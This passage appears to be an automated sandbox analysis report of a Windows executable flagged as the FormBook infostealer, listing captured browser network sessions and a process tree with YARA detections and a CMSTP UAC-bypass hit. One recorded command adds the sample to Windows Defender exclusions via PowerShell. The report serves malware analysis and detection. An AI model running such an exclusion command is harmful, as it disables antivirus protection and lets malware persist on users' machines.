                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75
                                                                                                                                                                            Data Ascii: ntElement||e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)retu


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
8            192.168.2.5   49826         18.165.220.110   443                3788   C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp                 Bytes transferred   Direction   Data
2024-12-11 08:39:52 UTC   519                 OUT         GET /b?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-11 08:39:52 UTC   656                 IN          HTTP/1.1 302 Found
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:52 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            Location: /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                            set-cookie: UID=10451f5f0fc3adf6ec43d6f1733906392; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 f0e28236e1c4da7e6a02d601c5d0ceca.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: TzWhc1pp_XK26QESdPYnDP02Bl2Pjqj-j0nTMOW8AiarbJ4o-8w4BQ==


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
9            192.168.2.5   49825         18.165.220.110   443                3788   C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp                 Bytes transferred   Direction   Data
2024-12-11 08:39:52 UTC   567                 OUT         GET /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: UID=10451f5f0fc3adf6ec43d6f1733906392
2024-12-11 08:39:53 UTC   326                 IN          HTTP/1.1 204 No Content
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:52 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 c1ca71e6238e57e7b87d021fa60aad98.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: llenXktn7Ww-zDJPuQnmt7pKL1HsD-Ps2vR3SH86-vkNSZEnbLXYdQ==


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
10           192.168.2.5   49849         18.165.220.110   443                3424   C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp                 Bytes transferred   Direction   Data
2024-12-11 08:39:54 UTC   566                 OUT         GET /b?rn=1733906391803&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                            Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: UID=10451f5f0fc3adf6ec43d6f1733906392
2024-12-11 08:39:55 UTC   434                 IN          HTTP/1.1 204 No Content
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:55 GMT
                                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                            set-cookie: UID=10451f5f0fc3adf6ec43d6f1733906392; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                            Via: 1.1 5c23ab9748dfedff76d0f834e4ad56b0.cloudfront.net (CloudFront)
                                                                                                                                                                            X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                            X-Amz-Cf-Id: WJiitv0QDoAQaW6xYWIbQ8CyPpb9zPo5ShNCylXxqRMTVWvYHi97CQ==


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
11           192.168.2.5   49879         151.101.1.108    443                3424   C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp                 Bytes transferred   Direction   Data
2024-12-11 08:40:01 UTC   297                 OUT         GET /ast/ast.js HTTP/1.1
                                                                                                                                                                            Accept: application/javascript, */*;q=0.8
                                                                                                                                                                            Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: acdn.adnxs.com
                                                                                                                                                                            Connection: Keep-Alive
2024-12-11 08:40:01 UTC   565                 IN          HTTP/1.1 200 OK
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 149741
                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                            Last-Modified: Mon, 18 Nov 2024 18:01:14 GMT
                                                                                                                                                                            ETag: "673b80ea-248ed"
                                                                                                                                                                            Expires: Tue, 19 Nov 2024 18:02:42 GMT
                                                                                                                                                                            Cache-Control: max-age=86402
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Age: 75966
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:01 GMT
                                                                                                                                                                            X-Served-By: cache-lga21942-LGA, cache-nyc-kteb1890025-NYC
                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                            X-Cache-Hits: 11, 0
                                                                                                                                                                            X-Timer: S1733906402.566500,VS0,VE1
                                                                                                                                                                            Vary: Accept-Encoding



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:03:38:55
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Nieuwebestellingen10122024.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Nieuwebestellingen10122024.exe"
                                                                                                                                                                            Imagebase:0x1df34220000
                                                                                                                                                                            File size:644'232 bytes
                                                                                                                                                                            MD5 hash:9A344F7AA0C680768ABA67A0738DEE2A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:03:38:55
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2332811973.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2328130427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2334142398.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:03:38:59
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:03:39:00
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:03:39:06
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:03:39:17
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe"
                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4500032925.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:12
                                                                                                                                                                            Start time:03:39:18
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                                                                                            Imagebase:0xa90000
                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4498799209.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4499774124.0000000000A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:03:39:32
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe"
                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:14
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:15
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                                                                                                                            Imagebase:0x7ff7643e0000
                                                                                                                                                                            File size:834'512 bytes
                                                                                                                                                                            MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:16
                                                                                                                                                                            Start time:03:39:36
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                                                                                                                                                                            Imagebase:0x7ff7f23a0000
                                                                                                                                                                            File size:540'712 bytes
                                                                                                                                                                            MD5 hash:89CF8972D683795DAB6901BC9456675D
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                                                            File size:85'632 bytes
                                                                                                                                                                            MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:03:39:37
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:03:39:38
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:03:39:38
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:24
                                                                                                                                                                            Start time:03:39:42
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:03:39:45
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:03:39:45
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                                                                                                                            Imagebase:0x7ff7643e0000
                                                                                                                                                                            File size:834'512 bytes
                                                                                                                                                                            MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:03:39:46
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2
                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                            File size:828'368 bytes
                                                                                                                                                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:03:39:48
                                                                                                                                                                            Start date:11/12/2024
                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:03:42:38
                                                                                                                                                                            Start date:11/12/2024
